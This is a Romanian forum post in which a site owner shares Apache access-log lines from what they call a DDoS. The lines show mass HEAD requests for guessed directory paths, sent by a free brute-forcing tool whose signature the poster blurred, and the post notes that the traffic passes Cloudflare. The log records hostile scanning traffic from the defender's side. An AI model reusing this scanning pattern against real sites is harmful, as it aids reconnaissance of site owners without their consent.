- ddos
-
(and 2 more)
Tagged with:
-
Acum de exemplu primesc urmatorul ddos, e un request http .. 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /computeractive/ HTTP/1.0" 404 - "-" "UNSOFT (http://H/index.php/Category:OWASP_********$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /egov_idcard_costing/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_Dir$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /ms2005_launch/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /personal-computer-world/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /screendigest_movie_downloads/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /2145654/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r_Proje$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /xmax/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r_Project)" 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /buyersguides/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r_$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /jobalerts/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r_Pro$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /review_sonyericsson_w550i/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWA$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /wlr_ofcom/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r_Pro$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /lichens_space_mars/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_DirB$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /automatic_graylisting/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_D$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /gripe_site/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_********r_Pr$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /baron_bofh_banged_up/ HTTP/1.0" 404 - "-" "UNSOFT (http://********/index.php/Category:OWASP_Di$ 127.0.0.1 - - [14/Sep/2012:15:33:43 +0400] "HEAD /thatcher_bequest/ HTTP/1.0" 404 - "-" "UNSOFT ([url]http://********/index.php/Category:OWASP_DirBu[/url] Am blurat "UNSOFT" si ***** ca sa nu dau idei altor persoane. Se pare ce incearca de pe foarte multe ip-uri foarte multe foldere pe site, acesta fiind un soft free pe care il gasim pe net. Practic ce am blurat este semnatura softului care face requesturile. Tin sa precizez tex, ca trece de cloudflare.
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with: